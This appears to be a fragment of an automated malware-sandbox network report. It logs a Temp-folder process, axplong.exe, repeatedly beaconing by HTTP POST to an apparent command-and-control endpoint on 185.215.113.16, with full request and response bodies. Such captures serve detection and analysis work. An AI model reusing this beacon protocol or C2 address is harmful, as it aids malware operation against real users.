                    Sep 27, 2024 01:29:31.488359928 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.494432926 CEST8049731185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.494543076 CEST4973180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.494668961 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:31.494736910 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.494915009 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:31.499664068 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.204375982 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.204503059 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.205123901 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.209938049 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.433598042 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.433676958 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.534950018 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.535265923 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.540112972 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.540201902 CEST8049732185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:32.540260077 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.540350914 CEST4973280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.540627003 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:32.545408964 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.258707047 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.258826017 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.298801899 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.303755999 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.526134968 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.526266098 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.641030073 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.641355991 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.646153927 CEST8049733185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.646239042 CEST4973380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.646274090 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:33.646341085 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.646493912 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:33.651428938 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.345848083 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.345949888 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.346648932 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.351419926 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.568824053 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.568906069 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.675293922 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.675623894 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.680411100 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.680438995 CEST8049734185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:34.680521965 CEST4973480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.680538893 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.680780888 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:34.687515974 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.538794041 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.538958073 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.539658070 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.544420958 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.771563053 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.771620989 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.878669024 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.879029989 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.884519100 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.884555101 CEST8049735185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:35.884630919 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.884646893 CEST4973580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.884841919 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:35.889588118 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.602411985 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.602524042 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.603429079 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.608158112 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.834774017 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.834918022 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.941188097 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.941603899 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.946446896 CEST8049736185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.946475983 CEST8049737185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:36.946518898 CEST4973680192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.946610928 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.946696043 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:36.951419115 CEST8049737185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:37.658889055 CEST8049737185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:37.659064054 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:37.659717083 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:37.664565086 CEST8049737185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:37.890383005 CEST8049737185.215.113.16192.168.2.7
                    Sep 27, 2024 01:29:37.890466928 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:38.005934000 CEST4973780192.168.2.7185.215.113.16
                    Sep 27, 2024 01:29:38.006258965 CEST4973880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.261001110 CEST4976880192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.261029959 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.261218071 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:09.265916109 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.735990047 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.736207008 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.736929893 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.737061024 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.738190889 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.738315105 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.739702940 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.740071058 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.745831013 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.745910883 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.745984077 CEST8049769185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:10.746217012 CEST4976980192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.746455908 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:10.751440048 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.497175932 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.497251034 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.616457939 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.617089987 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.621666908 CEST8049770185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.621716976 CEST4977080192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.621871948 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:11.621929884 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.622029066 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:11.626713991 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.326397896 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.326478004 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.329912901 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.330202103 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.334897995 CEST8049771185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.334966898 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:12.334975004 CEST4977180192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.335078001 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.335261106 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:12.339976072 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.056163073 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.056225061 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.167184114 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.167560101 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.172463894 CEST8049772185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.172482014 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.172545910 CEST4977280192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.172772884 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.173177004 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.177939892 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.871176004 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.871259928 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.874805927 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.875118017 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880080938 CEST8049773185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.880224943 CEST4977380192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880263090 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:13.880551100 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.880822897 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:13.885839939 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:14.618988037 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:14.619066000 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:14.725117922 CEST4977580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:14.725471020 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.096714973 CEST4977480192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.724850893 CEST8049775185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.724917889 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.724982977 CEST4977580192.168.2.7185.215.113.16
                    Sep 27, 2024 01:30:15.725775003 CEST8049774185.215.113.16192.168.2.7
                    Sep 27, 2024 01:30:15.725895882 CEST4977480192.168.2.7185.215.113.16
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 27, 2024 01:28:05.989511967 CEST | 52929 | 53 | 192.168.2.7 | 1.1.1.1
                    Sep 27, 2024 01:28:07.503690958 CEST | 62323 | 53 | 192.168.2.7 | 1.1.1.1
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Sep 27, 2024 01:28:05.989511967 CEST | 192.168.2.7 | 1.1.1.1 | 0x2a69 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                    Sep 27, 2024 01:28:07.503690958 CEST | 192.168.2.7 | 1.1.1.1 | 0xfa4c | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Sep 27, 2024 01:28:05.996236086 CEST | 1.1.1.1 | 192.168.2.7 | 0x2a69 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                    Sep 27, 2024 01:28:07.510807037 CEST | 1.1.1.1 | 192.168.2.7 | 0xfa4c | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                    • 185.215.113.16
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.7 | 49706 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:02.128978968 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:02.843842983 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:02.871293068 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:03.102998972 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.7 | 49707 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:03.211956978 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:03.922878027 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:03.923852921 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:04.152101994 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.7 | 49709 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:04.260428905 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:05.128912926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:05.129687071 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:05.354912996 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.7 | 49710 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:05.464993954 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:06.154469967 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:06.155379057 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:06.611717939 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Sep 27, 2024 01:29:06.627655983 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.7 | 49711 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:06.727642059 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:07.453269005 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:07.454080105 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:07.688414097 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.7 | 49712 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:07.805768967 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:08.869272947 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:08.869434118 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:08.870712996 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
